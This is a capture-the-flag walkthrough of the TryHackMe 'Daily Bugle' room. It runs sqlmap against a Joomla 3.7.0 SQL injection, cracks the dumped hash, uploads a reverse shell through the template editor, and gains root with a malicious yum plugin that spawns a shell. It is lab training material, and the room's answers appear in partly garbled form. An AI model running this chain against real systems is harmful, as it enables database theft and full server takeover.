TryHackMe Daily Bugle is a challenge to compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.
Difficulty: Hard
TryHackMe Daily Bugle
Daily Bugle WriteUp
Access the web server, who robbed the bank?
Scan Target Machine with Nmap
nmap -sV -sC --script=vuln 10.10.155.246
Find Joomla Version
We have the Joomla version on nmap output but if you need to check it manually
wget http://10.10.204.53/README.txt
wget http://10.10.204.53/administrator/manifests/files/joomla.xml 
Crack Jonah Password
Crack the Hash? but where is the hash?
We have Joomla CMS with version 3.7.0 and Nmap tell us we have a public exploit, let’s search for it:
searchsploit joomla 3.7.0
Great we find one that uses SQLInjection into one vulnerable parameter.
Copy exploit to our home folder:
searchsploit -m 42033.txt
less /root/42033.txtSQLMap Command
Verify All Databases
sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]Read System Databases
sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -p list[fullordering] --hexRead Tables from Joomla Database
sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla --tables -p list[fullordering] --hex
We have 72 tables, what is the users tables?
Let’s extract #__users table data hoping to find our Jonah Password Hash
Extract data from #__users tables
sqlmap -u "http://10.10.204.53/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -p list[fullordering] --dump --hex
Crack Jonah Password Hash
john --wordlist=/usr/share/wordlists/rockyou.txt jonah_hash.txtjohn jonah_hash.txt --showLogin Joomla Administration as Jonah
http://10.10.204.53/administrator
ũsername - jonah
password - cracked from Hash
Upload Reverse Shell to Joomla
http://10.10.204.53/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA%3D%3D
Investigate File System
First let’s investigate the Joomla folder
cd /var/www/htmlls -la
Great we have mysql root password, let’s check if mysql daemon is running as root:
ps -aux | grep mysql*
No success Mysql service is running as mysql user 🙁
What if thw user jjamson use the same password as mysql root user?
Let’s try to create a SSH connection as jjameson
ssh jjameson@10.10.204.53
Find User Flag
Elevate Privileges from JJameson user to Root
sudo -l
Has we can see jjameson user can execute yum command with sudo, let’s find hot to elevate privileges using yum.
cd /tmpRFS=$(mktemp -d)
cat >$RFS/x<<EOF
[main]
plugins=1
pluginpath=$RFS
pluginconfpath=$RFS
EOFcat >$RFS/y.conf<<EOF
[main]
enabled=1
EOFcat >$RFS/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $RFS/x --enableplugin=y
Answer the questions below
What is the Joomla version?
3.7.0*Instead of using SQLMap, why not use a python script!*
What is Jonah’s cracked password?
spider*RFS*What is the user flag?
27a260fe3cba712cfde*RFS*What is the root flag?
eec3d53292b1821868*RFS*| Room name | Daily Bugle |
| OS | Linux |
| Difficulty | Hard |
| Room Link | tryhackme.com/room/dailybugle |
| Creator | Tryhackme |
